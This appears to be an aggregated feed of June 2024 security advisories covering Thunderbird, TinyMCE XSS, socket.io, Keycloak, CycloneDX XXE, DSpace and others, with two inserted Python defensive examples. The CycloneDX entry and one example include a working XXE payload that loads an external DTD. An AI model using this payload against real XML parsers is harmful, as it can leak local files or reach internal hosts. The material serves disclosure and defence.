20.06.2024 03:00:00redhat[RHSA-2024:4002] thunderbird security update (important)Mozilla Thunderbird is a standalone mail and newsgroup client.This update upgrades Thunderbird to version 115.12.1.Security Fix(es):* thunderbird: Use-after-free in networking (CVE-2024-5702)* thunderbird: Use-after-free in JavaScript object transplant (CVE-2024-5688)* thunderbird: External protocol handlers leaked by timing attack (CVE-2024-5690)* thunderbird: Sandboxed iframes were able to bypass sandbox restrictions to open a new window (CVE-2024-5691)* thunderbird: Cross-Origin Image leak via Offscreen Canvas (CVE-2024-5693)* thunderbird: Memory Corruption in Text Fragments (CVE-2024-5696)* thunderbird: Memory safety bugs fixed in Firefox 127, Firefox ESR 115.12, and Thunderbird 115.12 (CVE-2024-5700)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4002
20.06.2024 17:20:58npm[NPM:GHSA-9HCV-J9PV-QMPH] TinyMCE Cross-Site Scripting (XSS) vulnerability using noneditable_regexp option (moderate)
### Impact
A [cross-site scripting (XSS)](https://owasp.org/www-community/attacks/xss/) vulnerability was discovered in TinyMCE's content extraction code. When using the `noneditable_regexp` option, specially crafted HTML attributes containing malicious code could be executed when content was extracted from the editor.
### Patches
This vulnerability has been patched in TinyMCE 7.2.0, TinyMCE 6.8.4 and TinyMCE 5.11.0 LTS by ensuring that, when using the `noneditable_regexp` option, any content within an attribute is properly verified to match the configured regular expression before being added.
### Fix
To avoid this vulnerability:
* Upgrade to TinyMCE 7.2.0 or higher.
* Upgrade to TinyMCE 6.8.4 or higher for TinyMCE 6.x.
* Upgrade to TinyMCE 5.11.0 LTS or higher for TinyMCE 5.x (only available as part of a commercial [long-term support](https://www.tiny.cloud/long-term-support/) contract).
### References
* [TinyMCE 6.8.4](https://www.tiny.cloud/docs/tinymce/6/6.8.4-release-notes/#overview)
* [TinyMCE 7.2.0](https://www.tiny.cloud/docs/tinymce/7/7.2-release-notes/#overview)
### For more information
If you have any questions or comments about this advisory:
* Email us at [infosec@tiny.cloud](mailto:infosec@tiny.cloud)
* Open an issue in the [TinyMCE repo](https://github.com/tinymce/tinymce/issues?q=is%3Aissue+is%3Aopen+sort%3Aupdated-desc)
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-9HCV-J9PV-QMPH
20.06.2024 17:23:20npm[NPM:GHSA-W9JX-4G6G-RP7X] TinyMCE Cross-Site Scripting (XSS) vulnerability using noscript elements (moderate)
### Impact
A [cross-site scripting (XSS)](https://owasp.org/www-community/attacks/xss/) vulnerability was discovered in TinyMCE's content parsing code. This allowed specially crafted noscript elements containing malicious code to be executed when that content was loaded into the editor.
### Patches
This vulnerability has been patched in TinyMCE 7.2.0, TinyMCE 6.8.4 and TinyMCE 5.11.0 LTS by ensuring that content within noscript elements is properly parsed.
### Fix
To avoid this vulnerability:
* Upgrade to TinyMCE 7.2.0 or higher.
* Upgrade to TinyMCE 6.8.4 or higher for TinyMCE 6.x.
* Upgrade to TinyMCE 5.11.0 LTS or higher for TinyMCE 5.x (only available as part of a commercial [long-term support](https://www.tiny.cloud/long-term-support/) contract).
### Acknowledgements
Tiny thanks [Malav Khatri](https://malavkhatri.com/) and another reporter for their help identifying this vulnerability.
### References
* [TinyMCE 6.8.4](https://www.tiny.cloud/docs/tinymce/6/6.8.4-release-notes/#overview)
* [TinyMCE 7.2.0](https://www.tiny.cloud/docs/tinymce/7/7.2-release-notes/#overview)
### For more information
If you have any questions or comments about this advisory:
* Email us at [infosec@tiny.cloud](mailto:infosec@tiny.cloud)
* Open an issue in the [TinyMCE repo](https://github.com/tinymce/tinymce/issues?q=is%3Aissue+is%3Aopen+sort%3Aupdated-desc)
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-W9JX-4G6G-RP7X
20.06.2024 17:14:52npm[NPM:GHSA-25HC-QCG6-38WJ] socket.io has an unhandled 'error' event (high)
### Impact
A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process.
```
node:events:502
      throw err; // Unhandled 'error' event
      ^

Error [ERR_UNHANDLED_ERROR]: Unhandled error. (undefined)
    at new NodeError (node:internal/errors:405:5)
    at Socket.emit (node:events:500:17)
    at /myapp/node_modules/socket.io/lib/socket.js:531:14
    at process.processTicksAndRejections (node:internal/process/task_queues:77:11) {
  code: 'ERR_UNHANDLED_ERROR',
  context: undefined
}
```
### Affected versions
| Version range | Needs minor update? |
|------------------|------------------------------------------------|
| `4.6.2...latest` | Nothing to do |
| `3.0.0...4.6.1` | Please upgrade to `socket.io@4.6.2` (at least) |
| `2.3.0...2.5.0` | Please upgrade to `socket.io@2.5.1` |
### Patches
This issue is fixed by https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115, included in `socket.io@4.6.2` (released in May 2023).
The fix was backported to the 2.x branch today: https://github.com/socketio/socket.io/commit/d30630ba10562bf987f4d2b42440fc41a828119c
### Workarounds
As a workaround for the affected versions of the `socket.io` package, you can attach a listener for the "error" event:
```js
io.on("connection", (socket) => {
  socket.on("error", () => {
    // ...
  });
});
```
### For more information
If you have any questions or comments about this advisory:
- Open a discussion [here](https://github.com/socketio/socket.io/discussions)
Thanks a lot to [Paul Taylor](https://github.com/Y0ursTruly) for the responsible disclosure.
### References
- https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115
- https://github.com/socketio/socket.io/commit/d30630ba10562bf987f4d2b42440fc41a828119c
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-25HC-QCG6-38WJ
19.06.2024 14:13:12ubuntu[USN-6841-1] PHP vulnerability (medium)PHP could be made to accept invalid URLs.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6841-1
19.06.2024 10:27:59ubuntu[USN-6839-1] MariaDB vulnerability (medium)A security issue was fixed in MariaDBhttps://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6839-1
19.06.2024 05:46:18ubuntu[USN-6840-1] Thunderbird vulnerabilitiesSeveral security issues were fixed in Thunderbird.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6840-1
19.06.2024 12:17:27almalinux[ALSA-2024:3968] container-tools:rhel8 bug fix and enhancement update (moderate)container-tools:rhel8 bug fix and enhancement updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3968
19.06.2024 12:15:05almalinux[ALSA-2024:3961] flatpak security update (important)flatpak security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3961
19.06.2024 12:10:34almalinux[ALSA-2024:3954] firefox security update (important)firefox security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3954
19.06.2024 12:12:22almalinux[ALSA-2024:3955] firefox security update (important)firefox security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3955
19.06.2024 12:13:38almalinux[ALSA-2024:3959] flatpak security update (important)flatpak security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3959
21.06.2024 18:52:39maven[MAVEN:GHSA-C25H-C27Q-5QPV] Keycloak leaks configured LDAP bind credentials through the Keycloak admin console (low)
### Impact
The LDAP testing endpoint allows changing the Connection URL independently of, and without having to re-enter, the currently configured LDAP bind credentials. An attacker with admin access (permission manage-realm) can change the LDAP host URL ("Connection URL") to a machine they control. The Keycloak server will connect to the attacker's host and try to authenticate with the configured credentials, thus leaking them to the attacker.
As a consequence, an attacker who has compromised the admin console, or compromised a user with sufficient privileges, can leak domain credentials and can then attack the domain.
### Acknowledgements
Special thanks to Simon Wessling for reporting this issue and helping us improve our project
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-C25H-C27Q-5QPV
21.06.2024 18:06:27maven[MAVEN:GHSA-V2XM-76PQ-PHCF] ClassGraph XML External Entity Reference (moderate)ClassGraph before 4.8.112 was not resistant to XML eXternal Entity (XXE) attacks.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-V2XM-76PQ-PHCF
21.06.2024 10:20:21almalinux[ALSA-2024:4036] thunderbird security update (important)thunderbird security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4036
21.06.2024 18:52:30maven[MAVEN:GHSA-GMRM-8FX4-66X7] Duplicate Advisory: Keycloak: Leak of configured LDAP bind credentials (low)
## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-c25h-c27q-5qpv. This link is maintained to preserve external references.
## Original Description
A vulnerability was found in Keycloak. The LDAP testing endpoint allows changing the Connection URL independently without re-entering the currently configured LDAP bind credentials. This flaw allows an attacker with admin access (permission manage-realm) to change the LDAP host URL ("Connection URL") to a machine they control. The Keycloak server will connect to the attacker's host and try to authenticate with the configured credentials, thus leaking them to the attacker. As a consequence, an attacker who has compromised the admin console or compromised a user with sufficient privileges can leak domain credentials and attack the domain.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-GMRM-8FX4-66X7
22.06.2024 23:12:20slackware[SSA:2024-174-01] emacs
New emacs packages are available for Slackware 15.0 and -current to fix a security issue.
**Here are the details from the Slackware 15.0 ChangeLog**
```
patches/packages/emacs-29.4-i586-1_slack15.0.txz: Upgraded.
  Emacs 29.4 is an emergency bugfix release intended to fix a security
  vulnerability: Arbitrary shell commands are no longer run when turning on
  Org mode. This is for security reasons, to avoid running malicious commands.
  (* Security fix *)
```
**Where to find the new packages**
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/emacs-29.4-i586-1_slack15.0.txz
Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/emacs-29.4-x86_64-1_slack15.0.txz
Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/e/emacs-29.4-i586-1.txz
Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/e/emacs-29.4-x86_64-1.txz
**MD5 signatures**
Slackware 15.0 package:
f8dd0514f953401e675d6f80895f43b1 emacs-29.4-i586-1_slack15.0.txz
Slackware x86_64 15.0 package:
100d1844e95b9b29c693c64c05c7a063 emacs-29.4-x86_64-1_slack15.0.txz
Slackware -current package:
527623759822b154558121c13de1cd18 e/emacs-29.4-i586-1.txz
Slackware x86_64 -current package:
fb6c3393bb28dd9fedd887e70c3d9564 e/emacs-29.4-x86_64-1.txz
**Installation instructions**
Upgrade the package as root:
`# upgradepkg emacs-29.4-i586-1_slack15.0.txz`
https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-174-01
22.06.2024 03:00:00gentoo[GLSA-202406-05] JHead: Multiple Vulnerabilities (normal)Multiple vulnerabilities have been discovered in JHead, the worst of which may lead to arbitrary code execution.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202406-05
22.06.2024 03:00:00gentoo[GLSA-202406-01] GLib: Privilege Escalation (high)A vulnerability has been discovered in GLib, which can lead to privilege escalation.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202406-01
22.06.2024 03:00:00gentoo[GLSA-202406-02] Flatpak: Sandbox Escape (high)A vulnerability has been discovered in Flatpak, which can lead to a sandbox escape.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202406-02
22.06.2024 03:00:00gentoo[GLSA-202406-03] RDoc: Remote Code Execution (high)A vulnerability has been discovered in RDoc, which can lead to execution of arbitrary code.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202406-03
22.06.2024 03:00:00gentoo[GLSA-202406-04] LZ4: Memory Corruption (normal)A vulnerability has been discovered in LZ4, which can lead to memory corruption.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202406-04
24.06.2024 23:44:49maven[MAVEN:GHSA-683X-4444-JXH8] Improper Restriction of XML External Entity Reference in org.cyclonedx:cyclonedx-core-java (high)
### Impact
Before deserializing CycloneDX Bill of Materials in XML format, _cyclonedx-core-java_ leverages XPath expressions to determine the schema version of the BOM. The `DocumentBuilderFactory` used to evaluate XPath expressions was not configured securely, making the library vulnerable to XML External Entity (XXE) injection.
XXE injection can be exploited to exfiltrate local file content, or to perform Server Side Request Forgery (SSRF) against infrastructure adjacent to the vulnerable application.
### PoC
```java
import org.cyclonedx.parsers.XmlParser;

class Poc {
  public static void main(String[] args) throws Exception {
    // Will throw org.cyclonedx.exception.ParseException: java.net.ConnectException: Connection refused
    new XmlParser().parse("""
        <?xml version="1.0" encoding="UTF-8"?>
        <!DOCTYPE bom [<!ENTITY % sp SYSTEM "https://localhost:1010/does-not-exist/file.dtd"> %sp;]>
        <bom xmlns="http://cyclonedx.org/schema/bom/1.5"/>
        """.getBytes());
  }
}
```
### Patches
The vulnerability has been fixed in _cyclonedx-core-java_ version 0.9.4.
### Workarounds
If feasible, applications can reject XML documents before handing them to _cyclonedx-core-java_ for parsing. This may be an option if incoming CycloneDX BOMs are known to be in JSON format.
### References
* Issue was fixed via <https://github.com/CycloneDX/cyclonedx-core-java/pull/434>
* Issue was introduced via <https://github.com/CycloneDX/cyclonedx-core-java/commit/162aa594f347b3f612fe0a45071693c3cd398ce9>
* <https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing>
* <https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xpathexpression>
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-683X-4444-JXH8
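The advisory's workaround is to reject XML documents before they reach the parser. Below is an added example, in Python and not cyclonedx-core-java's code or API, that does exactly that: it refuses any BOM carrying a DOCTYPE or ENTITY declaration, then reads the schema version from the root element's namespace rather than by evaluating XPath over a DTD-enabled DOM. Both sample documents are constructed for the example, the XXE payload being the one quoted in the advisory's PoC; the byte-level check assumes an ASCII-compatible encoding such as UTF-8.

```python
import re
import xml.etree.ElementTree as ET


class UnsafeXml(ValueError):
    """The document declares a DTD; a CycloneDX BOM never needs one."""


# Matches <!DOCTYPE and <!ENTITY anywhere in the document, case-insensitively
# and tolerating whitespace after "<!". Assumes an ASCII-compatible encoding;
# a UTF-16 document would have to be transcoded before this check.
_DTD_RE = re.compile(rb"<!\s*(DOCTYPE|ENTITY)\b", re.IGNORECASE)

# Root element of a CycloneDX XML BOM, with the schema version in the namespace.
_BOM_ROOT_RE = re.compile(r"^\{http://cyclonedx\.org/schema/bom/([0-9.]+)\}bom$")


def reject_dtd(xml_bytes: bytes) -> bytes:
    """Raise UnsafeXml if the document declares a DTD; otherwise return it."""
    m = _DTD_RE.search(xml_bytes)
    if m:
        raise UnsafeXml(f"DTD declaration at byte {m.start()}: {m.group(0)!r}")
    return xml_bytes


def bom_schema_version(xml_bytes: bytes) -> str:
    """Return the CycloneDX schema version ("1.5", ...) of an XML BOM, refusing
    to parse anything that carries a DTD. Only the root tag is inspected."""
    root = ET.fromstring(reject_dtd(xml_bytes))
    m = _BOM_ROOT_RE.match(root.tag)
    if not m:
        raise UnsafeXml(f"not a CycloneDX bom root element: {root.tag!r}")
    return m.group(1)


# Constructed inputs: a minimal clean BOM and the advisory's XXE payload.
CLEAN_BOM = (
    b'<?xml version="1.0" encoding="UTF-8"?>\n'
    b'<bom xmlns="http://cyclonedx.org/schema/bom/1.5" version="1"><components/></bom>'
)
XXE_BOM = (
    b'<?xml version="1.0" encoding="UTF-8"?>\n'
    b'<!DOCTYPE bom [<!ENTITY % sp SYSTEM "https://localhost:1010/does-not-exist/file.dtd"> %sp;]>\n'
    b'<bom xmlns="http://cyclonedx.org/schema/bom/1.5"/>'
)

if __name__ == "__main__":
    print("clean BOM schema:", bom_schema_version(CLEAN_BOM))
    try:
        bom_schema_version(XXE_BOM)
    except UnsafeXml as exc:
        print("rejected:", exc)
```

The byte-level scan is deliberately over-broad (a `<!DOCTYPE` inside a comment is also rejected); for a format that never legitimately needs a DTD, failing closed is the right trade-off.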
25.06.2024 00:27:58maven[MAVEN:GHSA-QCJ3-WPGM-QPXH] XWiki programming rights may be inherited by inclusion (critical)
### Impact
The content of a document included using `{{include reference="targetdocument"/}}` is executed with the rights of the includer and not with the rights of its author. This means that any user able to modify the target document can impersonate the author of the content which used the `include` macro.
### Patches
This has been patched in XWiki 15.0 RC1 by making the default behavior safe.
### Workarounds
Make sure to protect any included document so that only allowed users can modify it.
A workaround has been provided in 14.10.2 that allows forcing the included content to execute with the rights of the target content's author instead of the default behavior. See https://extensions.xwiki.org/xwiki/bin/view/Extension/Include%20Macro#HAuthor for more details.
### References
https://jira.xwiki.org/browse/XWIKI-5027
https://jira.xwiki.org/browse/XWIKI-20471
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:security@xwiki.org)
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-QCJ3-WPGM-QPXH
24.06.2024 13:11:08ubuntu[USN-6844-1] CUPS vulnerability (medium)CUPS could be made to chmod arbitrary paths with a specially crafted configuration file.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6844-1
24.06.2024 13:08:06ubuntu[USN-6845-1] Hibernate vulnerability (high)Hibernate could be made to expose sensitive information.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6845-1
25.06.2024 00:31:15maven[MAVEN:GHSA-36GF-VPJ2-J42W] Cross site scripting in Apache JSPWiki (moderate)XSS in the Upload page in Apache JSPWiki 2.12.1 and prior allows the attacker to execute JavaScript in the victim's browser and obtain some sensitive information about the victim. Apache JSPWiki users should upgrade to 2.12.2 or later.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-36GF-VPJ2-J42W
24.06.2024 15:16:49almalinux[ALSA-2024:4058] python3.11 security update (important)python3.11 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4058
24.06.2024 03:00:00debian[DSA-5715-2] composer regression updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5715-2
24.06.2024 03:00:00oraclelinux[ELSA-2024-4050] libreswan security update (moderate)
[4.12-2.0.1.1]
- Add libreswan-oracle.patch to detect Oracle Linux distro
[4.12-2.1]
- Fix CVE-2024-3652 (RHEL-40102)
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4050
24.06.2024 03:00:00oraclelinux[ELSA-2024-4058] python3.11 security update (important)
[3.11.9-1.0.1]
- Update rpm-macros description [Orabug: 36024572]
[3.11.9-1]
- Rebase to 3.11.9
- Security fixes for CVE-2023-6597 and CVE-2024-0450
- Fix expat tests for the latest expat security release
Resolves: RHEL-33672, RHEL-33684
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4058
24.06.2024 03:00:00redhat[RHSA-2024:4058] python3.11 security update (important)Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems. Security Fix(es): * python: Path traversal on tempfile.TemporaryDirectory (CVE-2023-6597) * python: The zipfile module is vulnerable to zip-bombs leading to denial of service (CVE-2024-0450) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4058
24.06.2024 15:13:31almalinux[ALSA-2024:4050] libreswan security update (moderate)libreswan security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4050
23.06.2024 03:00:00redhat[RHSA-2024:4050] libreswan security update (moderate)Libreswan is an implementation of IPsec and IKE for Linux. IPsec is the Internet Protocol Security and uses strong cryptography to provide both authentication and encryption services. These services allow you to build secure tunnels through untrusted networks such as virtual private network (VPN).Security Fix(es):* libreswan: IKEv1 default AH/ESP responder can crash and restart (CVE-2024-3652)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4050
23.06.2024 03:00:00freebsd[FREEBSD:4F6C4C07-3179-11EF-9DA5-1C697A616631] emacs -- Arbitrary shell code evaluation vulnerabilityGNU Emacs developers report: Emacs 29.4 is an emergency bugfix release intended to fix a security vulnerability. Arbitrary shell commands are no longer run when turning on Org mode in order to avoid running malicious code.https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:4F6C4C07-3179-11EF-9DA5-1C697A616631
25.06.2024 22:30:08ubuntu[USN-6849-1] Salt vulnerabilities (critical)Several security issues were fixed in Salt.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6849-1
25.06.2024 21:42:35ubuntu[USN-6746-2] Google Guest Agent and Google OS Config Agent vulnerabilityGoogle Guest Agent and OS Config Agent could be made to crash if they opened specially crafted JSON.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6746-2
25.06.2024 21:16:54ubuntu[USN-6848-1] Roundcube vulnerabilities (medium)Roundcube could be made to crash or run programs if it received specially crafted input.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6848-1
25.06.2024 20:25:36go[GO-2024-2947] Leak of sensitive information to log files in github.com/hashicorp/go-retryablehttp (medium)URLs were not sanitized when writing them to log files. This could lead to writing sensitive HTTP basic auth credentials to the log file.https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2947
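GO-2024-2947 is the classic log leak: a URL carrying basic-auth userinfo is written verbatim to a log line. The block below is an added example in Python, not go-retryablehttp's code or its fix, showing the two places to cut this off: a `redact_url` helper for code that logs a URL deliberately, and a `logging.Filter` that scrubs URLs embedded in free-text messages after formatting. The sample URLs and the log line are constructed; keeping the username and masking only the password is a design choice made for this example.

```python
import logging
import re
from urllib.parse import urlsplit, urlunsplit


def redact_url(url: str) -> str:
    """Return url with any password in the userinfo replaced by '***'.
    The host:port part is copied verbatim (so IPv6 brackets and case survive);
    URLs without a password are returned unchanged."""
    parts = urlsplit(url)
    if parts.password is None:
        return url
    hostport = parts.netloc.rpartition("@")[2]
    user = parts.username or ""
    return urlunsplit(parts._replace(netloc=f"{user}:***@{hostport}"))


# Loose URL matcher for free text: a scheme, "://", then everything up to
# whitespace or a quote/angle bracket.
_URL_RE = re.compile(r"[A-Za-z][A-Za-z0-9+.-]*://[^\s\"'<>]+")


def _redact_match(match: "re.Match[str]") -> str:
    try:
        return redact_url(match.group(0))
    except ValueError:
        # urlsplit rejects e.g. malformed IPv6 literals: fail closed.
        return "[unparseable url redacted]"


def redact_message(text: str) -> str:
    """Scrub every URL found in an arbitrary log message."""
    return _URL_RE.sub(_redact_match, text)


class RedactUrlsFilter(logging.Filter):
    """Formats the record early, scrubs it, and clears args so that no handler
    can re-render the original, secret-bearing arguments."""

    def filter(self, record: logging.LogRecord) -> bool:
        record.msg = redact_message(record.getMessage())
        record.args = ()
        return True


if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO, format="%(message)s")
    log = logging.getLogger("retry")
    log.addFilter(RedactUrlsFilter())
    # Constructed sample: the kind of line a retrying HTTP client emits.
    log.info("retrying GET %s (attempt %d)",
             "https://alice:hunter2@api.example.com:8443/v1/items?page=2", 3)
```

Attach the filter to the logger that the HTTP client writes to, not only to a handler: logger-level filters run before the record is handed to any handler, so a later-added file handler cannot reintroduce the secret.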
25.06.2024 20:07:32maven[MAVEN:GHSA-94CC-XJXR-PWVF] DSpace Cross Site Scripting (XSS) via a deposited HTML/XML document (low)
### Impact
In DSpace 7.0 through 7.6.1, when an HTML, XML or JavaScript Bitstream is downloaded, the user's browser _may_ execute any embedded JavaScript. If that embedded JavaScript is malicious, there is a risk of an XSS attack.
This attack may only be initialized by a user who already has Submitter privileges in the repository. The submitter must upload the malicious HTML/XML/JavaScript file themselves. The attack itself would not occur until a different authenticated user downloads the malicious file. CORS and CSRF protection built into DSpace help to limit the impact of the attack (and may block it in some scenarios).
If the repository is configured to only download HTML / XML / JavaScript Bitstreams using the [`Content-Disposition: attachment`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Disposition) header, then the attack is no longer possible. See "Workarounds" below.
### Patches
The fix is included in both 8.0 and 7.6.2. Please upgrade to one of these versions, or manually apply one of the "Workarounds" below.
If you are already running 7.6 or 7.6.1, then this vulnerability can be fixed via a configuration update in your `dspace.cfg` configuration file. See details below.
### Workarounds
**DSpace sites running 7.6 or 7.6.1** can fix this issue by adding the following `webui.content_disposition_format` settings to their `dspace.cfg` (or `local.cfg`). These settings force all HTML, XML, RDF & JavaScript files to always be downloaded to a user's machine, blocking the attack. For more details see [PR #9638](https://github.com/DSpace/DSpace/pull/9638)
```
webui.content_disposition_format = text/html
webui.content_disposition_format = text/javascript
webui.content_disposition_format = text/xml
webui.content_disposition_format = rdf
```
These settings will take effect immediately. There is no need to restart Tomcat.
To verify the settings are working: upload an HTML or XML file to an in-progress submission. Attempt to download the file. The file should *not* open in your browser window. Instead, it should download to your local computer.
**DSpace sites running 7.0 through 7.5** will need to **either** (CHOOSE ONE):
* Upgrade to 7.6.2 or 8.0
* Or, upgrade to 7.6 or 7.6.1 and then apply the configuration change mentioned above
* Or, manually add the `webui.content_disposition_format` setting (which was first released in 7.6), and then apply the configuration changes mentioned above.
  * The `webui.content_disposition_format` setting can be added by applying the changes in [PR #8891](https://github.com/DSpace/DSpace/pull/8891). A [`patch` file](https://github.com/DSpace/DSpace/pull/8891.patch) is also available.
  * Please be aware this patch may not apply cleanly to all prior versions of 7.x. In that scenario, you would need to find a way to manually apply the changes or consider a different workaround.
* Or, find a way in your Apache or NGinx proxy to force the `Content-Disposition: attachment` header to be sent for **all files** downloaded via `/server/api/core/bitstreams/[uuid]/content` in the REST API.
  * NOTE: This workaround will patch the vulnerability. However, it does so by no longer allowing users to open _any_ downloaded files in their browser window. (This behavior may or may not be desirable in the long term, so you may wish to remove it in the future, once you have upgraded.)
  * For example, in Apache, using "mod_headers", you may add a configuration similar to this in your `<VirtualHost>`:
    ```
    # Set "Content-Disposition: attachment" whenever path is /server/api/core/bitstreams/[uuid]/content
    Header set Content-Disposition attachment "expr=%{REQUEST_URI} =~ m#^/server/api/core/bitstreams/.*/content$#"
    ```
### References
Discovered and reported by Muhammad Zeeshan ([Xib3rR4dAr](https://github.com/Xib3rR4dAr))
### For more information
If you have any questions or comments about this advisory:
* Email us at [security@dspace.org](mailto:security@dspace.org)
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-94CC-XJXR-PWVF
25.06.2024 19:50:16ubuntu[USN-6847-1] libheif vulnerabilities (high)libheif could be made to crash if it opened a specially crafted file.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6847-1
25.06.2024 14:07:42ubuntu[USN-6846-1] Ansible vulnerabilities (high)Several security issues were fixed in Ansible.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6846-1
25.06.2024 16:57:29almalinux[ALSA-2024:4077] python3.11 security update (important)python3.11 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4077
25.06.2024 17:12:03almalinux[ALSA-2024:4084] git security update (important)git security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4084
25.06.2024 16:58:55almalinux[ALSA-2024:4078] python3.9 security update (important)python3.9 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4078
25.06.2024 17:01:56almalinux[ALSA-2024:4083] git security update (important)git security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4083
25.06.2024 03:00:00debian[DSA-5718-1] org-mode security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5718-1
25.06.2024 03:00:00debian[DSA-5719-1] emacs security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5719-1
25.06.2024 03:00:00oraclelinux[ELSA-2024-4077] python3.11 security update (important)
[3.11.7-1.1]
- Security fix for CVE-2023-6597
- Fix tests for XMLPullParser with Expat with fixed CVE
Resolves: RHEL-33884
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4077
25.06.2024 03:00:00oraclelinux[ELSA-2024-4078] python3.9 security update (important)
[3.9.18-3.1]
- Security fixes for CVE-2023-6597 and CVE-2024-0450
- Fix tests for XMLPullParser with Expat with fixed CVE
Resolves: RHEL-33887, RHEL-34287
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4078
25.06.2024 03:00:00oraclelinux[ELSA-2024-4083] git security update (important)
[2.43.5-1]
- Update to 2.43.5
- Related: RHEL-36402, RHEL-36414
[2.43.4-1]
- Update to 2.43.4
- Resolves: RHEL-36402, RHEL-36414
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4083
25.06.2024 03:00:00oraclelinux[ELSA-2024-4084] git security update (important)
[2.43.5-1]
- Update to 2.43.5
- Related: RHEL-36399, RHEL-36411
[2.43.4-1]
- Update to 2.43.4
- Resolves: RHEL-36399, RHEL-36411
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4084
25.06.2024 03:00:00redhat[RHSA-2024:4073] kpatch-patch security update (important)This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.Security Fix(es):* kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function (CVE-2024-1086)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4073
